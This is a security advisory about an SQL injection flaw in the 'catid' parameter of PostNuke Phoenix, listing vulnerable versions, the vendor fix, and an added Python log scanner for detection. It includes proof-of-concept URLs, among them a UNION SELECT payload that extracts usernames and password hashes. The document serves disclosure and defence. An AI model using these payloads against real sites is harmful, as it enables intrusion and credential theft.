PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
BID:12683
Info
| Bugtraq ID: | 12683 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 28 2005 12:00AM |
| Updated: | Feb 28 2005 12:00AM |
| Credit: | Discovery is credited to Maksymilian Arciemowicz. |
| Vulnerable: | PostNuke Development Team PostNuke Phoenix 0.760 RC2 |
| | PostNuke Development Team PostNuke Phoenix 0.750 |
| | PostNuke Development Team PostNuke Phoenix 0.726 |
| | PostNuke Development Team PostNuke Phoenix 0.723 |
| | PostNuke Development Team PostNuke Phoenix 0.722 |
| | PostNuke Development Team PostNuke Phoenix 0.721 |
| Not Vulnerable: | PostNuke Development Team PostNuke Phoenix 0.760 RC3 |
Discussion
PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input.
It is reported that the issue presents itself when malicious SQL syntax is passed to the application through the 'catid' variable.
PostNuke 0.760-RC2 and prior versions are reported vulnerable.
Exploit / POC
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/index.php?catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
http://www.example.com/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*
Solution / Fix
Solution:
The vendor has released PostNuke 0.760 RC3 to address this issue.
PostNuke Development Team PostNuke Phoenix 0.721
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
PostNuke Development Team PostNuke Phoenix 0.722
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
PostNuke Development Team PostNuke Phoenix 0.723
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
PostNuke Development Team PostNuke Phoenix 0.726
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
PostNuke Development Team PostNuke Phoenix 0.750
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
PostNuke Development Team PostNuke Phoenix 0.760 RC2
- PostNuke Development Team PostNuke Phoenix 0.760RC3
  http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-459.html
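For sites that cannot upgrade immediately, the following added example (not part of the original advisory and not PostNuke code) scans web-server access-log lines for 'catid' values that are not plain digits, which covers the proof-of-concept request shapes listed above. It assumes 'catid' is meant to be a non-negative integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: catid is a numeric category id, so only ASCII digits are expected.
VALID_CATID = re.compile(r"[0-9]+")
# SQL fragments that make a rejected value worth escalating (illustrative list).
SQL_HINTS = re.compile(r"'|\bunion\b|\bselect\b|/\*|--", re.IGNORECASE)


def check_catid(log_line):
    """Return None for a clean line, else (decoded_catid, severity)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes values; keep_blank_values keeps an empty "catid=".
    for value in parse_qs(query, keep_blank_values=True).get("catid", []):
        if VALID_CATID.fullmatch(value):
            continue
        severity = "sql-syntax" if SQL_HINTS.search(value) else "non-numeric"
        return value, severity
    return None


def scan(lines):
    """Map each suspicious line number (1-based) to its finding."""
    findings = {}
    for number, line in enumerate(lines, start=1):
        result = check_catid(line)
        if result:
            findings[number] = result
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Feb/2005:10:00:01 +0000] "GET /index.php?catid=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Feb/2005:10:00:07 +0000] "GET /index.php?catid=%27cXIb8O3 HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Feb/2005:10:00:09 +0000] "GET /modules.php?op=modload&name=NS-Polls&file=index&catid=-99999%20UNION%20SELECT%20null HTTP/1.1" 200 901',
    '192.0.2.51 - - [28/Feb/2005:10:02:30 +0000] "GET /modules.php?name=News&catid=abc HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, (value, severity) in scan(SAMPLE_LOG).items():
        print(f"line {number}: catid={value!r} [{severity}]")
```

The same digits-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) as a stopgap until 0.760 RC3 is installed.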
References
References:
- PostNuke Homepage (PostNuke Development Team)
- PostNuke Security Advisory PNSA 2005-1 (PostNuke Development Team)
- [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1 (Maksymilian Arciemowicz)